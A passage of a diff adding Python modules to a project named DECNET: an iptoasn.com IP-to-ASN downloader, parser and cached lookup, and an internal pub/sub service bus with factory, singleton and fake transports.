    ``{name}.tsv.gz.tmp`` and then renamed over ``{name}.tsv.gz``, so a
    failed download leaves the previous generation untouched.
    Failures are logged and skipped, never raised. The return value lists
    only the files that were actually replaced.
    """
    dest.mkdir(parents=True, exist_ok=True)
    fetched: list[Path] = []
    for name, url in IPTOASN_SOURCES:
        final = dest / f"{name}.tsv.gz"
        staging = final.with_suffix(".gz.tmp")
        try:
            _download(url, staging)
            staging.replace(final)
            fetched.append(final)
            logger.info(
                "asn.iptoasn: fetched %s (%d bytes)",
                name, final.stat().st_size,
            )
        except Exception as exc:
            logger.error(
                "asn.iptoasn: fetch failed for %s (%s): %s", name, url, exc
            )
            # Only the half-written staging file is removed; an older
            # copy of the dump beats having none.
            if staging.exists():
                staging.unlink(missing_ok=True)
    return fetched
 def _download(url: str, dest: Path) -> None:
    """Stream the body of ``url`` into ``dest``, sending the generic
    ``_USER_AGENT`` and applying ``_TIMEOUT_S`` to the connection. Errors
    from ``urlopen`` or the file write propagate to the caller."""
    request = urllib.request.Request(url, headers={"User-Agent": _USER_AGENT})
    with urllib.request.urlopen(request, timeout=_TIMEOUT_S) as response:  # nosec B310 — fixed https iptoasn URL
        with dest.open("wb") as sink:
            shutil.copyfileobj(response, sink)
--- a/decnet/asn/iptoasn/parse.py
+++ b/decnet/asn/iptoasn/parse.py
@@ -0,0 +1,79 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Parser for the iptoasn.com ``ip2asn-v4.tsv`` dump.
 Line shape (gzipped, one row per BGP-announced prefix)::
    1.0.0.0\\t1.0.0.255\\t13335\\tUS\\tCLOUDFLARENET
 Fields: ``range_start``, ``range_end``, ``as_number``, ``country_code``,
 ``as_description``. Both range columns are dotted IPv4 strings (the dump
 is IPv4-only — there's a separate ``ip2asn-v6.tsv.gz`` we don't pull).
 Rows skipped:
 * ``as_number == 0`` — iptoasn's sentinel for "unannounced" / private
  / reserved space. Country may still be present (``"None"`` / two-letter
  CC) but we don't care: the geoip module owns country, ASN owns BGP.
 * Rows where either range column won't parse as IPv4.
 * Rows with fewer than 3 tab-separated columns.
 """
 from __future__ import annotations
 import gzip
 import ipaddress
 import logging
 from pathlib import Path
 from typing import Iterator
 from decnet.asn.lookup import AsnInfo, Range
 logger = logging.getLogger("decnet.asn.iptoasn.parse")
 def parse_file(path: Path) -> Iterator[Range]:
    """Lazily yield ``(start_int, end_int_inclusive, AsnInfo)`` per usable row.
    A path ending in ``.gz`` is read through :mod:`gzip`; anything else is
    opened as plain text, which lets test harnesses hand-craft small
    fixtures. Undecodable bytes are replaced rather than raising.
    Rows are dropped when they have fewer than three tab-separated
    columns (blank lines included), a non-integer ASN, ASN ``0``, an
    unparsable IPv4 bound, or an end address below the start address.
    """
    open_text = gzip.open if path.suffix == ".gz" else open
    with open_text(path, "rt", encoding="utf-8", errors="replace") as rows:
        for lineno, raw in enumerate(rows, 1):
            fields = raw.rstrip("\n").split("\t")
            # A blank line splits into one empty field, so it fails this
            # check as well.
            if len(fields) < 3:
                continue
            try:
                asn = int(fields[2])
            except ValueError:
                logger.debug(
                    "asn.iptoasn: skipping malformed asn line %d in %s",
                    lineno, path.name,
                )
                continue
            # ASN 0 is iptoasn's sentinel for unannounced / reserved
            # space; there is nothing useful to attach to it.
            if asn == 0:
                continue
            try:
                first = int(ipaddress.IPv4Address(fields[0]))
                last = int(ipaddress.IPv4Address(fields[1]))
            except (ValueError, ipaddress.AddressValueError):
                logger.debug(
                    "asn.iptoasn: skipping malformed addr line %d in %s",
                    lineno, path.name,
                )
                continue
            if last < first:
                continue
            # The description is the 5th column. iptoasn quotes nothing,
            # but stray whitespace does occur; "" when the column is absent.
            label = fields[4].strip() if len(fields) >= 5 else ""
            yield (first, last, AsnInfo(asn=asn, name=label))
--- a/decnet/asn/iptoasn/provider.py
+++ b/decnet/asn/iptoasn/provider.py
@@ -0,0 +1,84 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """iptoasn provider — orchestrates fetch + parse into an :class:`AsnLookup`.
 Mirrors :class:`decnet.geoip.rir.provider.RirProvider` exactly: fetch,
 build a pickled cache, invalidate when raw files are newer than the
 cache.
 """
 from __future__ import annotations
 import logging
 from pathlib import Path
 from typing import Sequence
 from decnet.asn.base import Provider
 from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
 from decnet.asn.iptoasn.parse import parse_file
 from decnet.asn.lookup import AsnLookup, Range
 from decnet.asn.paths import ensure_root
 logger = logging.getLogger("decnet.asn.iptoasn.provider")
 # Pickled lookup cache — skips re-parsing the ~580k-row gz dump on every
 # profiler restart. Rebuilt whenever any raw file is newer than the
 # cache, see ``_cache_fresh``.
 _CACHE_NAME = ".iptoasn_index.pkl"
 class IptoasnProvider(Provider):
    """:class:`Provider` backed by the iptoasn.com bulk dump.
    Raw files and the pickled index both live under the directory
    returned by :func:`ensure_root`.
    """
    name = "iptoasn"
    def __init__(self) -> None:
        self._root = ensure_root()
    # ---------- Provider interface ----------
    def refresh(self) -> None:
        """Re-download the dump and invalidate the pickled index.
        The index is removed only when at least one raw file was actually
        replaced. After a failed download the previous raw file is still
        in place and the existing index still describes it, so deleting
        the index would only force a needless full re-parse.
        """
        logger.info("asn.iptoasn: refreshing dump into %s", self._root)
        written = fetch_all(self._root)
        if not written:
            return
        # Remove explicitly instead of relying on mtime comparison alone:
        # a file fetched within the same mtime tick as the cache would
        # otherwise still look "fresh" to ``_cache_fresh``.
        (self._root / _CACHE_NAME).unlink(missing_ok=True)
    def build_lookup(self) -> AsnLookup:
        """Return a lookup, from the pickled index when it is still fresh.
        Otherwise every existing raw file is parsed, the index rebuilt and
        the result cached best-effort: a failed cache load or save is
        logged and never raised.
        """
        cache = self._root / _CACHE_NAME
        if self._cache_fresh(cache):
            try:
                lookup = AsnLookup.load(cache)
                logger.debug(
                    "asn.iptoasn: loaded cached index (%d ranges)",
                    len(lookup),
                )
                return lookup
            except Exception as exc:
                logger.warning(
                    "asn.iptoasn: cache load failed, rebuilding: %s", exc
                )
        ranges: list[Range] = []
        for path in self.data_paths():
            if not path.exists():
                continue
            ranges.extend(parse_file(path))
        lookup = AsnLookup.from_ranges(ranges)
        try:
            lookup.save(cache)
        except Exception as exc:
            logger.warning("asn.iptoasn: cache save failed: %s", exc)
        logger.info("asn.iptoasn: built index with %d ranges", len(lookup))
        return lookup
    def data_paths(self) -> Sequence[Path]:
        """Paths of the raw dump files, one ``{name}.tsv.gz`` per source."""
        return [self._root / f"{name}.tsv.gz" for name, _url in IPTOASN_SOURCES]
    # ---------- internals ----------
    def _cache_fresh(self, cache: Path) -> bool:
        """True when the pickle exists and is at least as new as every raw file."""
        if not cache.exists():
            return False
        cache_mtime = cache.stat().st_mtime
        for path in self.data_paths():
            if path.exists() and path.stat().st_mtime > cache_mtime:
                return False
        return True
--- a/decnet/asn/lookup.py
+++ b/decnet/asn/lookup.py
@@ -0,0 +1,143 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Provider-agnostic IP→ASN lookup.
 A :class:`AsnLookup` is a frozen, sorted array of ``(start_ip,
 end_ip_inclusive, AsnInfo)`` ranges queried via :mod:`bisect`.
 O(log n) on ~600k ranges (a current iptoasn dump is ~580k rows).
 Private/loopback/invalid IPv4 and all IPv6 addresses resolve to
 ``None`` — the same policy :mod:`decnet.geoip.lookup` uses.
 """
 from __future__ import annotations
 import bisect
 import ipaddress
 import pickle  # nosec B403 — self-produced cache under /var/lib/decnet, never deserialized from untrusted input
 from dataclasses import dataclass
 from pathlib import Path
 from typing import Iterable, List, Optional, Tuple
@dataclass(frozen=True)
 class AsnInfo:
    """One BGP-announced prefix's origin metadata."""
    asn: int
    name: str  # AS description / org name; "" if absent in the source data
    prefix: Optional[str] = None  # synthesized covering CIDR; set at lookup time, not at rest
 Range = Tuple[int, int, AsnInfo]
 def _synthesize_prefix(start_int: int, end_int: int, queried_int: int) -> Optional[str]:
    """Return the most-specific CIDR from [start, end] that contains queried_int."""
    try:
        for net in ipaddress.summarize_address_range(
            ipaddress.IPv4Address(start_int), ipaddress.IPv4Address(end_int)
        ):
            if queried_int >= int(net.network_address) and queried_int <= int(net.broadcast_address):
                return str(net)
    except (ValueError, TypeError):
        pass
    return None
@dataclass
 class AsnLookup:
    """Indexed AS lookup over IPv4 ranges."""
    # Parallel arrays for bisect: _starts[i] is the start-IP of the i-th
    # range, _ends[i] its inclusive end, _infos[i] its AsnInfo.
    _starts: List[int]
    _ends: List[int]
    _infos: List[AsnInfo]
    @classmethod
    def from_ranges(cls, ranges: Iterable[Range]) -> "AsnLookup":
        """Build a lookup from ``(start, end_inclusive, AsnInfo)`` triples.
        Ranges are sorted by start; on identical starts, last writer
        wins (matches :class:`decnet.geoip.lookup.Lookup` semantics).
        Non-overlapping adjacency is preserved.
        """
        sorted_ranges = sorted(ranges, key=lambda r: (r[0], r[1]))
        starts: List[int] = []
        ends: List[int] = []
        infos: List[AsnInfo] = []
        for start, end, info in sorted_ranges:
            if starts and starts[-1] == start:
                ends[-1] = end
                infos[-1] = info
                continue
            starts.append(start)
            ends.append(end)
            infos.append(info)
        return cls(starts, ends, infos)
    def asn(self, ip: str) -> Optional[AsnInfo]:
        """Return the :class:`AsnInfo` for ``ip`` or ``None``.
        ``None`` on: IPv6, private/loopback/link-local/multicast/reserved
        addresses, malformed strings, and IPs outside every BGP-announced
        range in the source dump.
        """
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            return None
        if isinstance(addr, ipaddress.IPv6Address):
            return None
        if (
            addr.is_private
            or addr.is_loopback
            or addr.is_link_local
            or addr.is_multicast
            or addr.is_reserved
            or addr.is_unspecified
        ):
            return None
        n = int(addr)
        idx = bisect.bisect_right(self._starts, n) - 1
        if idx < 0:
            return None
        if n <= self._ends[idx]:
            info = self._infos[idx]
            prefix = _synthesize_prefix(self._starts[idx], self._ends[idx], n)
            return AsnInfo(asn=info.asn, name=info.name, prefix=prefix)
        return None
    def __len__(self) -> int:
        return len(self._starts)
    # ---------- persistence ----------
    def save(self, path: Path) -> None:
        """Pickle the lookup to *path* (atomic rename)."""
        tmp = path.with_suffix(path.suffix + ".tmp")
        tmp.parent.mkdir(parents=True, exist_ok=True)
        with tmp.open("wb") as fh:
            pickle.dump(
                {
                    "version": 1,
                    "starts": self._starts,
                    "ends": self._ends,
                    "infos": [(i.asn, i.name) for i in self._infos],
                },
                fh,
                protocol=pickle.HIGHEST_PROTOCOL,
            )
        tmp.replace(path)
    @classmethod
    def load(cls, path: Path) -> "AsnLookup":
        """Load a pickled lookup from *path*."""
        with path.open("rb") as fh:
            data = pickle.load(fh)  # nosec B301 — self-produced file under /var/lib/decnet
        if data.get("version") != 1:
            raise ValueError(
                f"unsupported asn-lookup index version: {data.get('version')!r}"
            )
        infos = [AsnInfo(asn=a, name=n) for a, n in data["infos"]]
        return cls(data["starts"], data["ends"], infos)
--- a/decnet/asn/paths.py
+++ b/decnet/asn/paths.py
@@ -0,0 +1,19 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Filesystem layout for ASN data — mirror of :mod:`decnet.geoip.paths`.
 ``ASN_ROOT`` is where providers drop their raw files and cache indexes.
 Default ``/var/lib/decnet/asn``. Override with ``DECNET_ASN_ROOT`` for
 test harnesses.
 """
 from __future__ import annotations
 import os
 from pathlib import Path
 ASN_ROOT = Path(os.environ.get("DECNET_ASN_ROOT", "/var/lib/decnet/asn"))
 def ensure_root() -> Path:
    """Make sure the ``ASN_ROOT`` directory exists (parents included) and
    hand it back. Does nothing when it is already there."""
    root = ASN_ROOT
    root.mkdir(parents=True, exist_ok=True)
    return root
--- a/decnet/bus/__init__.py
+++ b/decnet/bus/__init__.py
@@ -0,0 +1,19 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """DECNET ServiceBus — pub/sub notification substrate.
 The bus is the notification layer for DECNET's worker constellation.  The DB
 remains the source of truth for anything durable; the bus carries "something
 happened, go look" events.  Delivery is at-most-once, fire-and-forget.
 Consumers call :func:`get_bus` from :mod:`decnet.bus.factory`; never import
 transport implementations directly.  The factory selects the backend via
 ``DECNET_BUS_TYPE`` (``nats`` or ``fake``) and honors ``DECNET_BUS_ENABLED``.
 Topic hierarchy is defined in :mod:`decnet.bus.topics` and locked early so
 consumers can subscribe with stable wildcard patterns.
 """
 from __future__ import annotations
 from decnet.bus.base import BaseBus, Event, Subscription
 __all__ = ["BaseBus", "Event", "Subscription"]
--- a/decnet/bus/app.py
+++ b/decnet/bus/app.py
@@ -0,0 +1,93 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Process-wide bus singleton for request-serving workers (API, SSE routes).
 A single connected :class:`~decnet.bus.base.BaseBus` shared across request
 handlers — opening a UNIX socket per request would be wasteful and add
 latency to the hot path.  The API lifespan is responsible for calling
 :func:`close_app_bus` on shutdown; connect is lazy so tests and
 contract-test mode that never hit a publish/subscribe code path don't
 pay for a bus connection they'll never use.
 Failures during :meth:`BaseBus.connect` are swallowed and logged — a
 dead bus must never break request serving.  Publishers should treat a
 ``None`` return from :func:`get_app_bus` as "skip this notification",
 same as ``DECNET_BUS_ENABLED=false``.
 Connect is **retried with a short backoff** (not one-shot): a startup
 race where the API lifespan hits :func:`get_app_bus` before ``decnet
 bus`` is ready would otherwise poison the singleton for the entire
 process lifetime.  Instead we remember the last failure timestamp and
 let callers retry once ``_RETRY_BACKOFF`` seconds have passed.
 """
 from __future__ import annotations
 import asyncio
 import time
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
 from decnet.logging import get_logger
 log = get_logger("bus.app")
 # Publishers in the hot path shouldn't pay connect-retry latency on every
 # call; the dashboard's own 5 s poll interval recovers within one tick
 # once the bus comes up.  A persistently-dead bus only gets a connect
 # attempt every 2 s, not once per request.
 _RETRY_BACKOFF: float = 2.0
 # Held by get_app_bus() around the connect attempt, so concurrent first
 # callers do not each construct and connect their own client.
 _lock = asyncio.Lock()
 # The connected singleton. None until the first successful connect, and
 # None again after close_app_bus().
 _shared: BaseBus | None = None
 # time.monotonic() reading of the most recent failed connect; reset to
 # 0.0 after a successful connect and by close_app_bus().
 _last_failure_ts: float = 0.0
 async def get_app_bus() -> BaseBus | None:
    """Return the process-wide connected bus, or ``None`` if unavailable.
    On first call, constructs a client via :func:`get_bus` and awaits
    ``connect()``.  Subsequent calls return the cached instance.  If a
    connect attempt raises, the failure timestamp is recorded and
    subsequent calls within ``_RETRY_BACKOFF`` seconds return ``None``
    without re-attempting — after the backoff window, the next call
    retries.  This is what lets the API recover from a
    ``decnet bus``-started-after-API race without a full API restart.
    Never raises for connect failures; they are logged at warning level.
    """
    global _shared, _last_failure_ts
    def _backing_off() -> bool:
        # 0.0 means "no failure recorded". time.monotonic() has an
        # undefined reference point and may itself be below
        # _RETRY_BACKOFF, so the sentinel is tested explicitly instead of
        # being compared as if it were a timestamp.
        if _last_failure_ts == 0.0:
            return False
        return (time.monotonic() - _last_failure_ts) < _RETRY_BACKOFF
    if _shared is not None:
        return _shared
    if _backing_off():
        return None
    async with _lock:
        # Re-check under the lock: another task may have connected (or
        # failed) while this one was waiting.
        if _shared is not None:
            return _shared
        if _backing_off():
            return None
        try:
            candidate = get_bus(client_name="api")
            await candidate.connect()
            _shared = candidate
            _last_failure_ts = 0.0
            return _shared
        except Exception as exc:  # noqa: BLE001
            log.warning("app bus unavailable: %s", exc)
            _last_failure_ts = time.monotonic()
            return None
 async def close_app_bus() -> None:
    """Detach and close the shared bus, and forget any recorded failure.
    Meant for the API lifespan shutdown; calling it repeatedly is
    harmless. The singleton and the failure timestamp are cleared
    *before* closing, so a later ``get_app_bus()`` in the same process
    (rare, but tests do this) reconnects immediately instead of honouring
    a stale backoff. Errors from ``close()`` are logged, not raised.
    """
    global _shared, _last_failure_ts
    bus = _shared
    _shared = None
    _last_failure_ts = 0.0
    if bus is None:
        return
    try:
        await bus.close()
    except Exception as exc:  # noqa: BLE001
        log.warning("app bus close raised: %s", exc)
--- a/decnet/bus/base.py
+++ b/decnet/bus/base.py
@@ -0,0 +1,206 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Bus abstractions: the :class:`Event` envelope and the :class:`BaseBus` ABC.
 Every transport (NATS, in-process fake, null) speaks this contract.  The
 envelope is versioned (``v``) so future evolution never breaks deployed
 consumers that happen to see a newer event shape.
 Subscription model: :meth:`BaseBus.subscribe` returns a :class:`Subscription`
 that is an async context manager AND an async iterator.  The expected usage is:
    async with bus.subscribe("topology.*.mutation.*") as sub:
        async for event in sub:
            handle(event)
 Leaving the ``async with`` releases the underlying subscription handle; the
 transport is free to drop any buffered events after that point.
 """
 from __future__ import annotations
 import abc
 import asyncio
 import time
 import uuid
 from dataclasses import dataclass, field
 from typing import Any, AsyncIterator
 EVENT_SCHEMA_VERSION = 1
@dataclass(frozen=True)
class Event:
    """Immutable envelope carried by every bus message.
    Fields:
    * ``topic`` — subject the event was published on.
    * ``payload`` — event-specific data.
    * ``type`` — short discriminator (``"mutation.applied"``,
      ``"decky.state"``) for consumers that subscribe to a broad wildcard
      and dispatch in Python; redundant with the trailing segments of
      ``topic`` but cheaper to inspect.
    * ``v`` — envelope schema version, bumped on incompatible shape changes.
    * ``ts`` — epoch seconds (float); defaults to ``time.time()``.
    * ``id`` — random UUID hex so consumers can de-dupe if they ever see
      the same event twice (not expected under at-most-once delivery, but
      cheap insurance).
    """
    topic: str
    payload: dict[str, Any]
    type: str = ""
    v: int = EVENT_SCHEMA_VERSION
    ts: float = field(default_factory=time.time)
    id: str = field(default_factory=lambda: uuid.uuid4().hex)
    def to_dict(self) -> dict[str, Any]:
        """Return the wire-format dict (keys: v, id, topic, type, ts, payload)."""
        return {
            "v": self.v,
            "id": self.id,
            "topic": self.topic,
            "type": self.type,
            "ts": self.ts,
            "payload": self.payload,
        }
    @classmethod
    def from_dict(cls, topic: str, data: dict[str, Any]) -> "Event":
        """Reconstruct an Event from a wire-format dict.
        ``topic`` is passed explicitly because the transport knows which
        subject the message arrived on; trusting a ``topic`` field from the
        wire would let a misbehaving publisher spoof events on topics they
        don't actually publish to.
        Missing *or null* fields fall back to defaults: empty payload,
        empty type, the current schema version, the current time and a
        fresh random id.  ``v`` / ``ts`` values that are present but not
        convertible still raise ``ValueError`` / ``TypeError`` from
        ``int()`` / ``float()``.
        """
        raw_v = data.get("v")
        raw_ts = data.get("ts")
        return cls(
            topic=topic,
            payload=data.get("payload") or {},
            type=data.get("type") or "",
            # ``is None`` rather than ``or``: a legitimate 0 / 0.0 must
            # survive, only an absent or JSON-null field is defaulted.
            v=EVENT_SCHEMA_VERSION if raw_v is None else int(raw_v),
            ts=time.time() if raw_ts is None else float(raw_ts),
            id=data.get("id") or uuid.uuid4().hex,
        )
 class Subscription(abc.ABC):
    """Handle for one open subscription.
    Works both as an async context manager (leaving the ``async with``
    closes it) and as an async iterator of events.  Transports subclass
    this and supply :meth:`__anext__` and :meth:`_aclose`; application code
    obtains instances from :meth:`BaseBus.subscribe` rather than
    constructing them.
    """
    def __init__(self, pattern: str) -> None:
        self._closed = False
        self.pattern = pattern
    async def __aenter__(self) -> "Subscription":
        return self
    async def __aexit__(self, *exc: Any) -> None:
        await self.aclose()
    def __aiter__(self) -> AsyncIterator[Event]:
        return self
    async def aclose(self) -> None:
        """Close once; later calls are no-ops.
        The closed flag is raised before the transport hook is awaited, so
        the hook runs at most one time.
        """
        was_closed, self._closed = self._closed, True
        if not was_closed:
            await self._aclose()
    @abc.abstractmethod
    async def __anext__(self) -> Event:  # pragma: no cover - abstract
        raise NotImplementedError
    @abc.abstractmethod
    async def _aclose(self) -> None:  # pragma: no cover - abstract
        raise NotImplementedError
 class BaseBus(abc.ABC):
    """Abstract pub/sub transport.
    Contract for implementations: ``connect()`` and ``close()`` must each
    tolerate being awaited more than once, and both publishing and
    subscribing on a closed bus raise :class:`RuntimeError`.
    A bus is also an async context manager: entering awaits ``connect()``
    and leaving awaits ``close()``.
    """
    @abc.abstractmethod
    async def connect(self) -> None:
        """Acquire whatever transport resources are needed.  Idempotent."""
    @abc.abstractmethod
    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        """Send *payload* on *topic* without waiting for any acknowledgement.
        Delivery is at-most-once.  A transport error is logged by the
        implementation and then dropped rather than raised: losing a bus
        message must not take a worker down (DB is source of truth).
        """
    @abc.abstractmethod
    def subscribe(self, pattern: str) -> Subscription:
        """Open a :class:`Subscription` for events whose topic matches *pattern*.
        NATS wildcard semantics apply: ``*`` stands for one topic token and
        ``>`` for one-or-more trailing tokens.  For example:
        * ``topology.*.mutation.applied`` — ``applied`` events of every
          topology.
        * ``topology.abc123.mutation.*`` — every mutation state of a single
          topology.
        * ``topology.>`` — everything below the ``topology`` root.
        """
    @abc.abstractmethod
    async def close(self) -> None:
        """Release transport resources.  Idempotent."""
    async def __aenter__(self) -> "BaseBus":
        await self.connect()
        return self
    async def __aexit__(self, *exc: Any) -> None:
        await self.close()
 # ─── Wildcard matching shared across in-process transports ───────────────────
 def matches(pattern: str, topic: str) -> bool:
    """Return True iff *topic* matches *pattern* under NATS wildcard rules.
    ``*`` matches exactly one non-empty token; ``>`` matches one-or-more
    trailing tokens (so ``topology.>`` matches ``topology.abc.x`` but not
    ``topology`` alone).
    ``>`` is only a wildcard as the *final* pattern token.  A pattern with
    ``>`` anywhere else (``a.>.c``) is invalid and never matches; without
    this check everything after the ``>`` would be silently ignored and
    the pattern would match far more than its author wrote.
    """
    p_tokens = pattern.split(".")
    t_tokens = topic.split(".")
    last = len(p_tokens) - 1
    for i, p in enumerate(p_tokens):
        if p == ">":
            if i != last:
                # Tokens follow the full wildcard: invalid pattern.
                return False
            # Must have at least one token remaining to match.
            return i < len(t_tokens)
        if i >= len(t_tokens):
            return False
        if p == "*":
            if not t_tokens[i]:
                return False
            continue
        if p != t_tokens[i]:
            return False
    return len(p_tokens) == len(t_tokens)
 # Sentinel used by the in-process transports to signal "no more events"
 # through the asyncio.Queue fan-out without inventing a separate control
 # channel.  Not part of the wire protocol.
 _CLOSE_SENTINEL: Any = object()
 async def _next_or_stop(queue: "asyncio.Queue[Any]") -> Event:
    """Pop the next item from *queue*, raising ``StopAsyncIteration`` on close."""
    item = await queue.get()
    if item is _CLOSE_SENTINEL:
        raise StopAsyncIteration
    return item
--- a/decnet/bus/factory.py
+++ b/decnet/bus/factory.py
@@ -0,0 +1,86 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Bus factory — selects a :class:`~decnet.bus.base.BaseBus` implementation.
 Dispatch key: the ``DECNET_BUS_TYPE`` environment variable.
 * ``unix`` (default) → :class:`~decnet.bus.unix_client.UnixSocketBus`
 * ``fake``           → :class:`~decnet.bus.fake.FakeBus` (in-process)
 If ``DECNET_BUS_ENABLED`` is ``"false"`` the factory short-circuits to
 :class:`~decnet.bus.fake.NullBus` regardless of ``DECNET_BUS_TYPE`` — a
 cheap way for dev environments to run workers without a bus daemon.
 Mirrors :mod:`decnet.web.db.factory` (lazy imports inside each branch,
 env-driven dispatch, optional telemetry wrapping).  Callers MUST use
 :func:`get_bus` rather than instantiating transports directly.
 """
 from __future__ import annotations
 import os
 from typing import Any
 from decnet.bus.base import BaseBus
 def get_bus(**kwargs: Any) -> BaseBus:
    """Instantiate the bus implementation selected by environment.
    ``DECNET_BUS_ENABLED=false`` short-circuits to ``NullBus`` (keyword
    arguments are ignored).  Otherwise ``DECNET_BUS_TYPE`` (default
    ``unix``) picks the transport and the keyword arguments are forwarded:
    * ``UnixSocketBus`` accepts ``socket_path`` (overrides
      ``DECNET_BUS_SOCKET``) and ``client_name``.
    * ``FakeBus`` accepts ``queue_size``.  The unix-only options
      ``socket_path`` and ``client_name`` are discarded for this transport
      so call sites such as ``get_bus(client_name="api")`` work unchanged
      under ``DECNET_BUS_TYPE=fake``.  Any other unknown keyword still
      raises ``TypeError``.
    Raises:
        ValueError: ``DECNET_BUS_TYPE`` names an unsupported transport.
    """
    if os.environ.get("DECNET_BUS_ENABLED", "true").lower() == "false":
        from decnet.bus.fake import NullBus
        return NullBus()
    bus_type = os.environ.get("DECNET_BUS_TYPE", "unix").lower()
    if bus_type == "unix":
        from decnet.bus.unix_client import UnixSocketBus
        socket_path = kwargs.pop("socket_path", None) or _default_socket_path()
        bus: BaseBus = UnixSocketBus(socket_path=socket_path, **kwargs)
    elif bus_type == "fake":
        from decnet.bus.fake import FakeBus
        # FakeBus has no socket and no client identity; forwarding these
        # would make its constructor raise TypeError.
        for unix_only in ("socket_path", "client_name"):
            kwargs.pop(unix_only, None)
        bus = FakeBus(**kwargs)
    else:
        raise ValueError(f"Unsupported bus type: {bus_type}")
    return _maybe_wrap_telemetry(bus)
 def _default_socket_path() -> str:
    """Return the bus socket path honoring ``DECNET_BUS_SOCKET`` and falling
    back to ``/run/decnet/bus.sock`` → ``~/.decnet/bus.sock``.
    The runtime path (``/run/decnet``) is preferred because systemd
    ``RuntimeDirectory=decnet`` sets it up with the right perms; the home
    fallback keeps dev boxes usable without systemd.
    """
    explicit = os.environ.get("DECNET_BUS_SOCKET")
    if explicit:
        return explicit
    runtime_dir = "/run/decnet"
    if os.path.isdir(runtime_dir) and os.access(runtime_dir, os.W_OK):
        return f"{runtime_dir}/bus.sock"
    return os.path.expanduser("~/.decnet/bus.sock")
 def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
    """Wrap *bus* in a tracing proxy if OTEL is enabled, else return as-is.
    Uses :func:`decnet.telemetry.wrap_repository` as the underlying proxy —
    its implementation is generic (wraps any async method in a span), so we
    reuse it with a bus-appropriate tracer name.  If telemetry isn't wired
    up at all we no-op.
    """
    try:
        from decnet.telemetry import wrap_repository
    except ImportError:
        return bus
    try:
        return wrap_repository(bus)
    except Exception:  # pragma: no cover - defensive
        return bus
--- a/decnet/bus/fake.py
+++ b/decnet/bus/fake.py
@@ -0,0 +1,184 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """In-process bus transports.
 * :class:`FakeBus` — real pub/sub semantics without touching a socket.  Used
  by unit tests and anywhere ``DECNET_BUS_TYPE=fake`` is set.  Lets code
  that depends on the bus be exercised entirely inside a single event loop,
  matching the DECNET testing convention of not opening real network
  sockets from unit tests.
 * :class:`NullBus` — no-op.  Returned by :func:`~decnet.bus.factory.get_bus`
  when ``DECNET_BUS_ENABLED=false`` so workers can start cleanly in dev
  environments where no bus daemon is running.  Publishes are dropped;
  subscriptions yield nothing and close cleanly.
 """
 from __future__ import annotations
 import asyncio
 from typing import Any
 from decnet.bus.base import (
    BaseBus,
    Event,
    Subscription,
    _CLOSE_SENTINEL,
    matches,
 )
 from decnet.logging import get_logger
 log = get_logger("bus.fake")
 # Per-subscriber bounded queue: backpressure policy is drop-oldest so a slow
 # consumer cannot stall publishers (the invariant — DB is the source of
 # truth — makes dropped events acceptable).
 _DEFAULT_QUEUE_SIZE = 1024
 # ─── FakeBus ─────────────────────────────────────────────────────────────────
 class _FakeSubscription(Subscription):
    """Queue-backed subscription handed out by :meth:`FakeBus.subscribe`.
    :meth:`FakeBus.publish` enqueues matching events on ``_queue``; closing
    the subscription removes it from the owning bus."""
    def __init__(self, bus: "FakeBus", pattern: str, queue: "asyncio.Queue[Any]") -> None:
        super().__init__(pattern)
        self._queue = queue
        self._bus = bus
    async def __anext__(self) -> Event:
        # Once closed, stop immediately without touching the queue.
        if not self._closed:
            nxt = await self._queue.get()
            if nxt is not _CLOSE_SENTINEL:
                return nxt
        raise StopAsyncIteration
    async def _aclose(self) -> None:
        self._bus._unregister(self)
        # Wake a consumer that may be parked in __anext__.  If the queue is
        # full the sentinel is skipped; the next __anext__ call sees
        # ``_closed`` and stops anyway.
        try:
            self._queue.put_nowait(_CLOSE_SENTINEL)
        except asyncio.QueueFull:
            pass
 class FakeBus(BaseBus):
    """In-process pub/sub.
    Publishes iterate every active subscription and enqueue the event on
    the ones whose pattern matches the topic.  If a subscriber's queue is
    full, the oldest event is discarded to make room — same at-most-once
    semantics as the real UNIX-socket transport.
    """
    def __init__(self, queue_size: int = _DEFAULT_QUEUE_SIZE) -> None:
        # ``queue_size`` is the per-subscriber asyncio.Queue ``maxsize``.
        self._queue_size = queue_size
        self._subs: list[_FakeSubscription] = []
        self._connected = False
        self._closed = False
        self._lock = asyncio.Lock()
    async def connect(self) -> None:
        """Mark the bus connected; there is no real transport to open."""
        self._connected = True
    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        """Fan *payload* out to every subscription whose pattern matches *topic*.
        Raises:
            RuntimeError: the bus has been closed.
        """
        if self._closed:
            raise RuntimeError("publish on closed bus")
        event = Event(topic=topic, payload=payload, type=event_type)
        async with self._lock:
            # Snapshot the targets so the fan-out below runs on a stable list.
            targets = [s for s in self._subs if matches(s.pattern, topic)]
        for sub in targets:
            _enqueue_drop_oldest(sub._queue, event)
    def subscribe(self, pattern: str) -> Subscription:
        """Register and return a new subscription with its own bounded queue.
        Raises:
            RuntimeError: the bus has been closed.
        """
        if self._closed:
            raise RuntimeError("subscribe on closed bus")
        queue: asyncio.Queue[Any] = asyncio.Queue(maxsize=self._queue_size)
        sub = _FakeSubscription(self, pattern, queue)
        self._subs.append(sub)
        return sub
    def _unregister(self, sub: _FakeSubscription) -> None:
        """Forget *sub*; unknown subscriptions are ignored."""
        try:
            self._subs.remove(sub)
        except ValueError:
            pass
    async def close(self) -> None:
        """Close the bus and end every open subscription.  Idempotent."""
        if self._closed:
            return
        self._closed = True
        # Wake every still-open subscription so iterators unblock cleanly.
        # The sentinel MUST land even when a queue is full: a consumer whose
        # queue was full would otherwise drain its buffer and then block
        # forever on ``queue.get()`` with nothing left to wake it.  Reuse
